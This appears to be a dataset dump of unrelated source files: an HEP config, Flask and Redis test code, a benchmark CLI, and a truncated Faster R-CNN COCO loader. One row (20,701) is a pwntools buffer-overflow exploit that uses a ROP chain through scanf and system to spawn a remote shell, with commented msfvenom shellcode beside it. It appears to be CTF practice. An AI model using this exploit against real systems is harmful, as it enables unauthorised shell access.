index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
20,700 | 2512f1fff77540a1e97118ade8a7cc7890fe9db3 | import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST',eras.Run3)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.MessageLogger.cerr.threshold = ''
process.MessageLogger.cerr.FwkReport.reportEvery = 100
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True),
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration.StandardSequences.RawToDigi_Data_cff')
process.load('Configuration.StandardSequences.L1Reco_cff')
process.load('Configuration.StandardSequences.Reconstruction_Data_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/eos/cms/tier0/store/data/Commissioning2021/ZeroBias/RAW/v1/000/346/512/00000/f87a2268-8f93-4389-b708-98a42a50c3e8.root'),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Output definition
process.RECOoutput = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:step3.root'),
outputCommands = process.RECOEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
process.TFileService = cms.Service("TFileService",
fileName = cms.string("mahidebugger.root")
)
# Additional output definition
# Other statements
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run3_data', '')
process.hbheprereco.cpu.saveInfos = cms.bool(True)
process.load("RecoLocalCalo.HcalRecAlgos.test.mahiDebugger_cfi")
# Path and EndPath definitions
process.raw2digi_step = cms.Path(process.hcalDigis)
process.reconstruction_step = cms.Path(process.hbheprereco)
process.flat_step = cms.Path(process.mahiDebugger)
process.RECOoutput_step = cms.EndPath(process.RECOoutput)
process.endjob_step = cms.EndPath(process.endOfProcess)
# Schedule definition
process.schedule = cms.Schedule(process.raw2digi_step,process.reconstruction_step,process.flat_step)
|
20,701 | 39a8487e2f856361ee2b13630e3ac3a284939ce8 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-05-13 23:26:33
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
import roputils,os,time
from pwn import *
context(log_level="debug")
DEBUG = 0
target = "./pwn9"
remote_ip = "192.168.5.80"
port = 8000
rop = roputils.ROP(target)
# msfvenom -p linux/x86/exec CMD=/bin/sh -b "\x0b\x00" -f python
# buf = ""
# buf += "\x2b\xc9\x83\xe9\xf5\xe8\xff\xff\xff\xff\xc0\x5e\x81"
# buf += "\x76\x0e\x7d\x30\x90\xf9\x83\xee\xfc\xe2\xf4\x17\x3b"
# buf += "\xc8\x60\x2f\x56\xf8\xd4\x1e\xb9\x77\x91\x52\x43\xf8"
# buf += "\xf9\x15\x1f\xf2\x90\x13\xb9\x73\xab\x95\x38\x90\xf9"
# buf += "\x7d\x1f\xf2\x90\x13\x1f\xe3\x91\x7d\x67\xc3\x70\x9c"
# buf += "\xfd\x10\xf9"
buf = "/bin/sh;"
# bss = rop.section('.bss')
# rop.got('puts')
# rop.call('read', 0, addr_bss, 0x100)
# msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x0b\x0d\x0a'
if DEBUG:
p = process(target,env={"LD_LIBRARY_PATH":sys.path[0]})
gdb.attach(p,"b*0x80487AF\nc")
else:
p = remote(remote_ip,port)
def sl(data):
p.sendline(data)
def sd(data):
p.send(data)
def ru(data):
return p.recvuntil(data)
ru(":")
payload = "a"*(0x88+4)
payload += rop.call('__isoc99_scanf', 0x804888F,0x0804A034)
payload += rop.call('system',0x0804A034)
sl(payload)
sl("1")
sl(buf)
p.interactive() |
20,702 | 76aa308a982720f1ae75fc8ace2103ef0b679a3c | def sum(a, b):
if a <= 0 and b <= 0:
print("양수만 입력하세요.")
return 0
return a + b
a = 3
b = 4
c = sum(a, b)
a = -1
b = 3
c = sum(a, b)
print(c) |
20,703 | 6a06079bfbaf2aa7e8285f80ae346d4517abbedb | from flask import *
from app import app
import random
import uuid
index = Blueprint('index', __name__)
def generateHex():
letters = ("A","B","C","D","E","F","G","H")
numbers = ("1","2","3","4","5","6", "7","8","9")
string1 = ''
for i in range(0,3):
letter = random.choice(letters)
num = random.choice(numbers)
string2 = num.join(letter)
string3 = letter.join(num)
string1 = string1 + string2 + string3
return string1
@app.route('/', methods=['GET', 'POST'])
def do_index():
if request.method == 'GET':
if request.cookies.get('userID'):
return render_template('index/index.html')
else:
resp = make_response(render_template('index/index.html'))
resp.set_cookie('userID', bytes(uuid.uuid4()))
return resp
if request.method == 'POST':
hexId = generateHex()
while app.mongo.db.challenge.find_one({'challengeId': hexId}):
hexId = generateHex()
challengeName = request.form['challengeName']
#timer = request.form['timer']
challenge = {
'challengeId': hexId,
'name': challengeName,
#'timer': timer,
#'endTime': dateTime.min,
'submissions': {
'nextKey': 0
}
}
app.mongo.db.challenge.insert(challenge)
return (url_for('do_challenge', challengeId=hexId))
|
20,704 | f7df79ca1a87316a08e9a08e9a7142d09c9bcb64 | import time
import unittest
from frontstage import app, redis
from frontstage.common.session import SessionHandler
class TestSession(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
self.app.testing = True
self.redis = redis
self.redis.flushall()
def test_create_session(self):
# Create session and get session key
session = SessionHandler()
session.create_session(encoded_jwt='test_jwt')
session_key = session.session_key
# Retrieve encoded_jwt from session
test_jwt = self.redis.get(session_key)
self.assertEqual(test_jwt, 'test_jwt'.encode())
def test_update_session(self):
# Create session and get session key
session = SessionHandler()
session.create_session(encoded_jwt='test_jwt')
session_key = session.session_key
# Wait 3 seconds and update the session
time.sleep(3)
session.update_session()
# Check that the session expiry time has been reset
expires_in = redis.ttl(session_key)
self.assertEqual(expires_in, 3600)
def test_update_session_with_session_key(self):
# Create session and get session key
session = SessionHandler()
session.create_session(encoded_jwt='test_jwt')
session_key = session.session_key
# Wait 3 seconds and update the session
time.sleep(3)
session.update_session(session_key)
# Check that the session expiry time has been reset
expires_in = redis.ttl(session_key)
self.assertEqual(expires_in, 3600)
def test_get_encoded_jwt(self):
# Create session and get session key
session = SessionHandler()
session.create_session(encoded_jwt='test_jwt')
session_key = session.session_key
encoded_jwt = session.get_encoded_jwt(session_key)
self.assertEqual(encoded_jwt, 'test_jwt'.encode())
def test_delete_session(self):
# Create session and get session key
session = SessionHandler()
session.create_session(encoded_jwt='test_jwt')
session_key = session.session_key
session.delete_session(session_key)
session = redis.get(session_key)
self.assertEqual(session, None)
|
20,705 | a2ae72a6674583384bc1071f3ea5a50202ba39da |
def devide(a,b):
if b == 0:
raise IndexError("被除数不能为0!")
else:
print(a/b)# ZeroDevisionError
try:
devide(6,0)
except Exception as e:
print("所有异常我都能捕捉!!",e) # 我们捕捉所有异常
except ZeroDivisionError as e:
print("我处理了第一个异常") # 第一个异常的处理
except IndexError as e:
print("我处理了第二个异常")# 第二个异常的处理
|
20,706 | 089339a5c90140cc9812e5a8261e7f980ee51258 | from flask import jsonify
from werkzeug.http import HTTP_STATUS_CODES
def bad_request(message=None):
payload = {'error': HTTP_STATUS_CODES.get(400)}
if message:
payload['message'] = message
response = jsonify(payload)
response.states_code = 400
return response |
20,707 | ab4089ee28e0f672aa66577c7a812d251d346843 | from flask import Blueprint
visualization = Blueprint('visualization', __name__)
from . import views
|
20,708 | f5d6d9d4ded916eff41ae38b24acee4bca97f1a3 | from benchmarks.htap.lib.controller import HTAPController
def add_parser(subparsers):
parser = subparsers.add_parser('htap')
parser.add_argument(
'--oltp-workers', default=32, type=int, help=(
'The number of OLTP workers executing TPC-C-like transactions (i.e. simulated clients), default: 32.'))
parser.add_argument(
'--olap-workers', default=1, type=int, help=(
'The number of OLAP workers (streams) running TPC-H-like queries, default: 1.'))
parser.add_argument(
'--target-tps', default=None, type=int, help=(
'The target TPS for the OLTP workload, default: unlimited.'))
parser.add_argument(
'--duration', default=60, type=int, help=(
'How many seconds the benchmark should run for, default: 60.'))
parser.add_argument(
'--olap-timeout', default='5min', help=(
'Timeout for OLAP queries, default: 5 minutes'))
parser.add_argument(
'--csv-interval', default=10, type=int, help=(
'How often to report stats to the csv files in seconds, default: 10'))
parser.add_argument(
'--dry-run', action='store_true', help=(
"Only generate transactions and analytical queries but don't send them to the database. "
"Can be useful for measuring script throughput."))
parser.add_argument(
'--monitoring-interval', default=1, type=float, help=(
'Number of seconds to wait between updates of the monitoring display, default: 1.0'))
parser.add_argument(
'--stats-dsn', help=('The DSN to use for collecting statistics into a database. '
'Not defining it will disable statistics collection.'))
parser.add_argument('--explain-analyze', action='store_true', default=False,
help=('Whether to run EXPLAIN ANALYZE. Will save plans into the "plan" directory.'
))
parser.add_argument('--use-server-side-cursors', default=False, action='store_true',
required=False, help=('Use server-side cursors for executing the queries')
)
parser.add_argument('--dont-wait-until-enough-data', default=False, action='store_true',
required=False, help=('Do NOT wait until there is enough data for OLAP queries to run with a constant dataset size')
)
parser.add_argument('--olap-dsns', nargs='+',
required=False, help=('Use separate olap servers')
)
parser.add_argument('--output', choices=['csv', 'print'], default='print',
nargs='+', help=('How the results output should look like. '
'Multiple options possible, separated by space'
))
parser.add_argument('--csv-file', default='results.csv', help=(
'Where to save the summary csv file, if csv output is selected. '
'The default is results.csv in the current directory.'
))
parser.add_argument('--ignored-queries', required=False, nargs='+', default=[], help=(
'Optional list of ignored queries for the OLAP workload.'
))
def run(args):
controller = HTAPController(args)
controller.run()
|
20,709 | 6fde02b54237908c430b15d51bca7349e0ccaf00 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# Monkey-patch because I trained with a newer version.
# This can be removed once PyTorch 0.4.x is out.
# See https://discuss.pytorch.org/t/question-about-rebuild-tensor-v2/14560
import torch._utils
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
import torch
import torch.nn as nn
from torch.nn import init
import torch.nn.functional as F
import torch.utils.data
from torch.autograd import Variable
from torch.utils.data.dataloader import default_collate
import torchvision
import torchvision.transforms as transforms
from torchvision.utils import save_image
import sys
import os
import time
import numpy as np
import cv2
import argparse
import yaml
import json
import random
import math
import copy
import shutil
import logging
import scipy.sparse
from tqdm import tqdm
from collections import namedtuple
from easydict import EasyDict as edict
from config import CONFIG, config_load
# Load CONFIG
parser = argparse.ArgumentParser(description='Training code')
parser.add_argument('--config', default='config.yaml', type=str, help='yaml config file')
args = parser.parse_args()
config_load(args.config)
# config_load('config.yaml')
print ('==> CONFIG is: \n', CONFIG, '\n')
# Set logger
logger = logging.getLogger(__name__)
format = logging.Formatter("%(asctime)s - %(message)s") # output format
sh = logging.StreamHandler(stream=sys.stdout) # output to standard output
sh.setFormatter(format)
logger.addHandler(sh)
if CONFIG.DEBUG:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# Create LOG_DIR and SNAPSHOT_DIR
LOGDIR = os.path.join(CONFIG.LOGS.LOG_DIR, '%s_%d'%(CONFIG.NAME, int(time.time())))
SNAPSHOTDIR = os.path.join(CONFIG.LOGS.SNAPSHOT_DIR, '%s_%d'%(CONFIG.NAME, int(time.time())))
if not os.path.exists(LOGDIR):
os.makedirs(LOGDIR)
if not os.path.exists(SNAPSHOTDIR):
os.makedirs(SNAPSHOTDIR)
# Store the code into LOG_DIR/shutil
if CONFIG.LOGS.LOG_SHUTIL_ON:
SHUTILDIR = os.path.join(LOGDIR, 'shutil')
if os.path.exists(SHUTILDIR):
shutil.rmtree(SHUTILDIR)
SHUTIL_IGNORELIST = [CONFIG.LOGS.SNAPSHOT_DIR, CONFIG.LOGS.LOG_DIR] + \
CONFIG.LOGS.LOG_SHUTIL_IGNORELIST
if os.path.exists(CONFIG.LOGS.LOG_SHUTIL_IGNOREFILE):
lines = open(CONFIG.LOGS.LOG_SHUTIL_IGNOREFILE).readlines()
SHUTIL_IGNORELIST += [l.strip() for l in lines]
print ('==> Shutil Code to File: %s \n'%(SHUTILDIR))
print ('==> Shutil Ignore Patterns: ', SHUTIL_IGNORELIST, '\n')
shutil.copytree('./', SHUTILDIR, ignore=shutil.ignore_patterns(*SHUTIL_IGNORELIST))
####################################################################################################
# COCO Dataset
####################################################################################################
FieldOfAnchors = namedtuple(
'FieldOfAnchors', [
'field_of_anchors', 'num_cell_anchors', 'stride', 'field_size'
]
)
_threadlocal_foa = {}
from generate_anchors import generate_anchors
def get_field_of_anchors(stride, anchor_sizes, anchor_aspect_ratios):
global _threadlocal_foa
cache_key = str(stride) + str(anchor_sizes) + str(anchor_aspect_ratios)
if cache_key in _threadlocal_foa.keys():
return _threadlocal_foa[cache_key]
# Anchors at a single feature cell
cell_anchors = generate_anchors(
stride=stride, sizes=anchor_sizes, aspect_ratios=anchor_aspect_ratios
)
num_cell_anchors = cell_anchors.shape[0]
# Generate canonical proposals from shifted anchors
# Enumerate all shifted positions on the (H, W) grid
fpn_max_size = CONFIG.FPN.COARSEST_STRIDE * np.ceil(
CONFIG.TRAIN.MAX_SIZE / float(CONFIG.FPN.COARSEST_STRIDE)
)
field_size = int(np.ceil(fpn_max_size / float(stride)))
shifts = np.arange(0, field_size) * stride
shift_x, shift_y = np.meshgrid(shifts, shifts)
shift_x = shift_x.ravel()
shift_y = shift_y.ravel()
shifts = np.vstack((shift_x, shift_y, shift_x, shift_y)).transpose()
# Broacast anchors over shifts to enumerate all anchors at all positions
# in the (H, W) grid:
# - add A cell anchors of shape (1, A, 4) to
# - K shifts of shape (K, 1, 4) to get
# - all shifted anchors of shape (K, A, 4)
# - reshape to (K*A, 4) shifted anchors
A = num_cell_anchors
K = shifts.shape[0]
field_of_anchors = (
cell_anchors.reshape((1, A, 4)) +
shifts.reshape((1, K, 4)).transpose((1, 0, 2))
)
# print ('fpn_max_size:', fpn_max_size)
# print ('field_size:', field_size)
# print ('stride:', stride)
# print ('shift_x:', shift_x.shape)
# print ('shifts:', shifts.shape)
# print ('field_of_anchors:', field_of_anchors.shape)
field_of_anchors = field_of_anchors.reshape((K * A, 4))
foa = FieldOfAnchors(
field_of_anchors=field_of_anchors.astype(np.float32),
num_cell_anchors=num_cell_anchors,
stride=stride,
field_size=field_size,
)
_threadlocal_foa[cache_key] = foa
return foa
from pycocotools.coco import COCO
from pycocotools import mask as COCOmask
import pycocotools.mask as mask_util
class CocoDataset():
def __init__(self, ImageRoot, AnnoFile):
self.imgroot = ImageRoot
self.COCO = COCO(AnnoFile)
# Set up dataset classes
category_ids = self.COCO.getCatIds()
categories = [c['name'] for c in self.COCO.loadCats(category_ids)]
self.category_to_id_map = dict(zip(categories, category_ids))
self.classes = ['__background__'] + categories
self.num_classes = len(self.classes)
self.json_category_id_to_contiguous_id = {
v: i + 1
for i, v in enumerate(self.COCO.getCatIds())
}
self.contiguous_category_id_to_json_id = {
v: k
for k, v in self.json_category_id_to_contiguous_id.items()
}
# print ('self.category_to_id_map:', self.category_to_id_map)
# print ('self.classes:', self.classes)
# print ('self.num_classes:', self.num_classes)
# print ('self.json_category_id_to_contiguous_id:', self.json_category_id_to_contiguous_id)
# print ('self.contiguous_category_id_to_json_id:', self.contiguous_category_id_to_json_id)
# logger.info('self.num_classes: %d' % self.num_classes)
self.image_ids = self.COCO.getImgIds()
self.image_ids.sort()
if CONFIG.DEBUG:
self.image_ids = self.image_ids[0:128]
# self.filterednum = 0
# roidb = []
# for i in tqdm(range(self.__len__())):
# roidb += [self.get_data(i)]
# self._compute_and_log_stats(roidb)
# print (self.__len__())
# logger.info('Filtered %d roidb entries'%self.filterednum)
# print (self.__len__()-self.filterednum)
self.foa = get_field_of_anchors(CONFIG.RPN.STRIDE, CONFIG.RPN.SIZES, CONFIG.RPN.ASPECT_RATIOS)
self.all_anchors = self.foa.field_of_anchors
def __len__(self):
return len(self.image_ids)
def __getitem__(self, idx):
rawdata = self.get_data(idx)
im_blob, im_scales = self.get_image_blob(rawdata)
# get_minibatch_blob_names(), get_rpn_blob_names()
# Single level RPN blobs
blobs = {
'im_info': [],
'rpn_labels_int32_wide': [],
'rpn_bbox_targets_wide': [],
'rpn_bbox_inside_weights_wide': [],
'rpn_bbox_outside_weights_wide': []
}
blobs['data'] = im_blob
valid = self.add_rpn_blobs(blobs, im_scales, rawdata)
# Squeeze batch dim
for key in blobs:
if key != 'roidb':
blobs[key] = blobs[key].squeeze(axis=0)
# blobs['roidb'] = blob_utils.serialize(blobs['roidb']) ???
return blobs
def collate_minibatch(self, list_of_blobs):
"""Stack samples seperately and return a list of minibatches
A batch contains NUM_GPUS minibatches and image size in different minibatch may be different.
Hence, we need to stack smaples from each minibatch seperately.
"""
def pad_image_data(list_of_blobs):
max_shape = np.array([blobs['data'].shape[1:] for blobs in list_of_blobs]).max(axis=0)
output_list = []
for blobs in list_of_blobs:
data_padded = np.zeros((3, max_shape[0], max_shape[1]), dtype=np.float32)
_, h, w = blobs['data'].shape
data_padded[:, :h, :w] = blobs['data']
blobs['data'] = data_padded
output_list.append(blobs)
return output_list
Batch = {key: [] for key in list_of_blobs[0]}
# Because roidb consists of entries of variable length, it can't be batch into a tensor.
# So we keep roidb in the type of "list of ndarray".
list_of_roidb = [blobs.pop('roidb') for blobs in list_of_blobs]
for i in range(0, len(list_of_blobs), CONFIG.SOLVER.IMS_PER_BATCH):
mini_list = list_of_blobs[i:(i + CONFIG.SOLVER.IMS_PER_BATCH)]
# Pad image data
mini_list = pad_image_data(mini_list)
minibatch = default_collate(mini_list)
minibatch['roidb'] = list_of_roidb[i:(i + CONFIG.SOLVER.IMS_PER_BATCH)]
for key in minibatch:
Batch[key].append(minibatch[key])
return Batch
def _get_rpn_blobs(self, im_height, im_width, foas, all_anchors, gt_boxes):
total_anchors = all_anchors.shape[0]
straddle_thresh = CONFIG.TRAIN.RPN_STRADDLE_THRESH
if straddle_thresh >= 0:
# Only keep anchors inside the image by a margin of straddle_thresh
# Set TRAIN.RPN_STRADDLE_THRESH to -1 (or a large value) to keep all
# anchors
inds_inside = np.where(
(all_anchors[:, 0] >= -straddle_thresh) &
(all_anchors[:, 1] >= -straddle_thresh) &
(all_anchors[:, 2] < im_width + straddle_thresh) &
(all_anchors[:, 3] < im_height + straddle_thresh)
)[0]
# keep only inside anchors
anchors = all_anchors[inds_inside, :]
else:
inds_inside = np.arange(all_anchors.shape[0])
anchors = all_anchors
num_inside = len(inds_inside)
# logger.debug('total_anchors: %d', total_anchors)
# logger.debug('inds_inside: %d', num_inside)
# logger.debug('anchors.shape: %s', str(anchors.shape))
# Compute anchor labels:
# label=1 is positive, 0 is negative, -1 is don't care (ignore)
labels = np.empty((num_inside, ), dtype=np.int32)
labels.fill(-1)
if len(gt_boxes) > 0:
# Compute overlaps between the anchors and the gt boxes overlaps
anchor_by_gt_overlap = bbox_overlaps(anchors, gt_boxes)
# Map from anchor to gt box that has highest overlap
anchor_to_gt_argmax = anchor_by_gt_overlap.argmax(axis=1)
# For each anchor, amount of overlap with most overlapping gt box
anchor_to_gt_max = anchor_by_gt_overlap[np.arange(num_inside),
anchor_to_gt_argmax]
# Map from gt box to an anchor that has highest overlap
gt_to_anchor_argmax = anchor_by_gt_overlap.argmax(axis=0)
# For each gt box, amount of overlap with most overlapping anchor
gt_to_anchor_max = anchor_by_gt_overlap[
gt_to_anchor_argmax,
np.arange(anchor_by_gt_overlap.shape[1])
]
# Find all anchors that share the max overlap amount
# (this includes many ties)
anchors_with_max_overlap = np.where(
anchor_by_gt_overlap == gt_to_anchor_max
)[0]
# Fg label: for each gt use anchors with highest overlap
# (including ties)
labels[anchors_with_max_overlap] = 1
# Fg label: above threshold IOU
labels[anchor_to_gt_max >= CONFIG.TRAIN.RPN_POSITIVE_OVERLAP] = 1
# subsample positive labels if we have too many
num_fg = int(CONFIG.TRAIN.RPN_FG_FRACTION * CONFIG.TRAIN.RPN_BATCH_SIZE_PER_IM)
fg_inds = np.where(labels == 1)[0]
if len(fg_inds) > num_fg:
disable_inds = np.random.choice(
fg_inds, size=(len(fg_inds) - num_fg), replace=False
)
labels[disable_inds] = -1
fg_inds = np.where(labels == 1)[0]
# subsample negative labels if we have too many
# (samples with replacement, but since the set of bg inds is large most
# samples will not have repeats)
num_bg = CONFIG.TRAIN.RPN_BATCH_SIZE_PER_IM - np.sum(labels == 1)
bg_inds = np.where(anchor_to_gt_max < CONFIG.TRAIN.RPN_NEGATIVE_OVERLAP)[0]
if len(bg_inds) > num_bg:
enable_inds = bg_inds[np.random.randint(len(bg_inds), size=num_bg)]
labels[enable_inds] = 0
bg_inds = np.where(labels == 0)[0]
bbox_targets = np.zeros((num_inside, 4), dtype=np.float32)
bbox_targets[fg_inds, :] = bbox_transform_inv(
anchors[fg_inds, :], gt_boxes[anchor_to_gt_argmax[fg_inds], :]).astype(np.float32, copy=False)
# Bbox regression loss has the form:
# loss(x) = weight_outside * L(weight_inside * x)
# Inside weights allow us to set zero loss on an element-wise basis
# Bbox regression is only trained on positive examples so we set their
# weights to 1.0 (or otherwise if config is different) and 0 otherwise
bbox_inside_weights = np.zeros((num_inside, 4), dtype=np.float32)
bbox_inside_weights[labels == 1, :] = (1.0, 1.0, 1.0, 1.0)
# The bbox regression loss only averages by the number of images in the
# mini-batch, whereas we need to average by the total number of example
# anchors selected
# Outside weights are used to scale each element-wise loss so the final
# average over the mini-batch is correct
bbox_outside_weights = np.zeros((num_inside, 4), dtype=np.float32)
# uniform weighting of examples (given non-uniform sampling)
num_examples = np.sum(labels >= 0)
bbox_outside_weights[labels == 1, :] = 1.0 / num_examples
bbox_outside_weights[labels == 0, :] = 1.0 / num_examples
# Map up to original set of anchors
labels = self._unmap(labels, total_anchors, inds_inside, fill=-1)
bbox_targets = self._unmap(
bbox_targets, total_anchors, inds_inside, fill=0
)
bbox_inside_weights = self._unmap(
bbox_inside_weights, total_anchors, inds_inside, fill=0
)
bbox_outside_weights = self._unmap(
bbox_outside_weights, total_anchors, inds_inside, fill=0
)
# Split the generated labels, etc. into labels per each field of anchors
blobs_out = []
start_idx = 0
for foa in foas:
H = foa.field_size
W = foa.field_size
A = foa.num_cell_anchors
end_idx = start_idx + H * W * A
_labels = labels[start_idx:end_idx]
_bbox_targets = bbox_targets[start_idx:end_idx, :]
_bbox_inside_weights = bbox_inside_weights[start_idx:end_idx, :]
_bbox_outside_weights = bbox_outside_weights[start_idx:end_idx, :]
start_idx = end_idx
# labels output with shape (1, A, height, width)
_labels = _labels.reshape((1, H, W, A)).transpose(0, 3, 1, 2)
# bbox_targets output with shape (1, 4 * A, height, width)
_bbox_targets = _bbox_targets.reshape(
(1, H, W, A * 4)).transpose(0, 3, 1, 2)
# bbox_inside_weights output with shape (1, 4 * A, height, width)
_bbox_inside_weights = _bbox_inside_weights.reshape(
(1, H, W, A * 4)).transpose(0, 3, 1, 2)
# bbox_outside_weights output with shape (1, 4 * A, height, width)
_bbox_outside_weights = _bbox_outside_weights.reshape(
(1, H, W, A * 4)).transpose(0, 3, 1, 2)
blobs_out.append(
dict(
rpn_labels_int32_wide=_labels,
rpn_bbox_targets_wide=_bbox_targets,
rpn_bbox_inside_weights_wide=_bbox_inside_weights,
rpn_bbox_outside_weights_wide=_bbox_outside_weights
)
)
return blobs_out[0] if len(blobs_out) == 1 else blobs_out
def add_rpn_blobs(self, blobs, im_scales, rawdata):
"""Add blobs needed training RPN-only and end-to-end Faster R-CNN models."""
im_i = 0
scale = im_scales[im_i]
im_height = np.round(rawdata['height'] * scale)
im_width = np.round(rawdata['width'] * scale)
gt_inds = np.where(
(rawdata['gt_classes'] > 0) & (rawdata['is_crowd'] == 0)
)[0]
gt_rois = rawdata['boxes'][gt_inds, :] * scale
# TODO(rbg): gt_boxes is poorly named;
# should be something like 'gt_rois_info'
gt_boxes = np.zeros((len(gt_inds), 6), dtype=np.float32)
gt_boxes[:, 0] = im_i # batch inds
gt_boxes[:, 1:5] = gt_rois
gt_boxes[:, 5] = rawdata['gt_classes'][gt_inds]
im_info = np.array([[im_height, im_width, scale]], dtype=np.float32)
blobs['im_info'].append(im_info)
# Add RPN targets
# Classical RPN, applied to a single feature level
rpn_blobs = self._get_rpn_blobs(im_height, im_width, [self.foa], self.all_anchors, gt_rois)
for k, v in rpn_blobs.items():
blobs[k].append(v)
#
for k, v in blobs.items():
if isinstance(v, list) and len(v) > 0:
blobs[k] = np.concatenate(v)
valid_keys = [
'has_visible_keypoints', 'boxes', 'segms', 'seg_areas', 'gt_classes',
'gt_overlaps', 'is_crowd', 'box_to_gt_ind_map', 'gt_keypoints'
]
minimal_roidb = [{} for _ in range(1)]
i = 0
e = rawdata
for k in valid_keys:
if k in e:
minimal_roidb[i][k] = e[k]
# blobs['roidb'] = blob_utils.serialize(minimal_roidb)
blobs['roidb'] = minimal_roidb
# Always return valid=True, since RPN minibatches are valid by design
return True
def get_image_blob(self, rawdata):
"""Builds an input blob from the images in the roidb at the specified
scales.
"""
# Sample random scales to use for each image in this batch
scale_inds = np.random.randint(
0, high=len(CONFIG.TRAIN.SCALES), size=1)
processed_ims = []
im_scales = []
im = cv2.imread(rawdata['image'])
if rawdata['flipped']:
im = im[:, ::-1, :]
target_size = CONFIG.TRAIN.SCALES[scale_inds[0]]
im, im_scale = self._prep_im_for_blob(
im, CONFIG.DATASET.MEAN, [target_size], CONFIG.TRAIN.MAX_SIZE)
im_scales.append(im_scale[0])
processed_ims.append(im[0])
# Create a blob to hold the input images [n, c, h, w]
blob = self._im_list_to_blob(processed_ims)
return blob, im_scales
def _im_list_to_blob(self, ims):
"""Convert a list of images into a network input. Assumes images were
prepared using prep_im_for_blob or equivalent: i.e.
- BGR channel order
- pixel means subtracted
- resized to the desired input size
- float32 numpy ndarray format
Output is a 4D HCHW tensor of the images concatenated along axis 0 with
shape.
"""
if not isinstance(ims, list):
ims = [ims]
max_shape = np.array([im.shape[:2] for im in ims]).max(axis=0) # get_max_shape()
num_images = len(ims)
blob = np.zeros(
(num_images, max_shape[0], max_shape[1], 3), dtype=np.float32)
for i in range(num_images):
im = ims[i]
blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
# Move channels (axis 3) to axis 1
# Axis order will become: (batch elem, channel, height, width)
channel_swap = (0, 3, 1, 2)
blob = blob.transpose(channel_swap)
return blob
def _prep_im_for_blob(self, im, pixel_means, target_sizes, max_size):
"""Prepare an image for use as a network input blob. Specially:
- Subtract per-channel pixel mean
- Convert to float32
- Rescale to each of the specified target size (capped at max_size)
Returns a list of transformed images, one for each target size. Also returns
the scale factors that were used to compute each returned image.
"""
im = im.astype(np.float32, copy=False)
im -= pixel_means
im_shape = im.shape
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
ims = []
im_scales = []
for target_size in target_sizes:
im_scale = self._get_target_scale(im_size_min, im_size_max, target_size, max_size)
im_resized = cv2.resize(im, None, None, fx=im_scale, fy=im_scale,
interpolation=cv2.INTER_LINEAR)
ims.append(im_resized)
im_scales.append(im_scale)
return ims, im_scales
def _get_target_scale(self, im_size_min, im_size_max, target_size, max_size):
"""Calculate target resize scale
"""
im_scale = float(target_size) / float(im_size_min)
# Prevent the biggest axis from being more than max_size
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
return im_scale
def get_data(self, idx):
"""Return an roidb corresponding to the json dataset. Optionally:
- include ground truth boxes in the roidb
- add proposals specified in a proposals file
- filter proposals based on a minimum side length
- filter proposals that intersect with crowd regions
"""
image_id = self.image_ids[idx]
datainfo = self.COCO.loadImgs(image_id)[0]
rawdata = {
'id': image_id,
'filename': datainfo['file_name'],
'image': os.path.join(self.imgroot, datainfo['file_name']),
'width': datainfo['width'],
'height': datainfo['height'],
'flipped': False,
'boxes': np.empty((0, 4), dtype=np.float32),
'segms': [],
'gt_classes': np.empty((0), dtype=np.int32),
'seg_areas': np.empty((0), dtype=np.float32),
'gt_overlaps': scipy.sparse.csr_matrix(
np.empty((0, self.num_classes), dtype=np.float32)
),
'is_crowd': np.empty((0), dtype=np.bool),
'box_to_gt_ind_map': np.empty((0), dtype=np.int32)
}
self._add_gt_annotations(rawdata)
self._add_class_assignments(rawdata)
if CONFIG.AUGS.FLIP_ON and random.random()<0.5:
self._flip(rawdata)
if not self._is_valid(rawdata):
# self.filterednum += 1
return self.get_data(idx+1) # DIFF: may get same data twice.
rawdata['bbox_targets'] = compute_targets(rawdata)
return rawdata
def _compute_and_log_stats(self, roidb):
classes = self.classes
char_len = np.max([len(c) for c in classes])
hist_bins = np.arange(len(classes) + 1)
# Histogram of ground-truth objects
gt_hist = np.zeros((len(classes)), dtype=np.int)
for rawdata in roidb:
gt_inds = np.where(
(rawdata['gt_classes'] > 0) & (rawdata['is_crowd'] == 0))[0]
gt_classes = rawdata['gt_classes'][gt_inds]
gt_hist += np.histogram(gt_classes, bins=hist_bins)[0]
logger.debug('Ground-truth class histogram:')
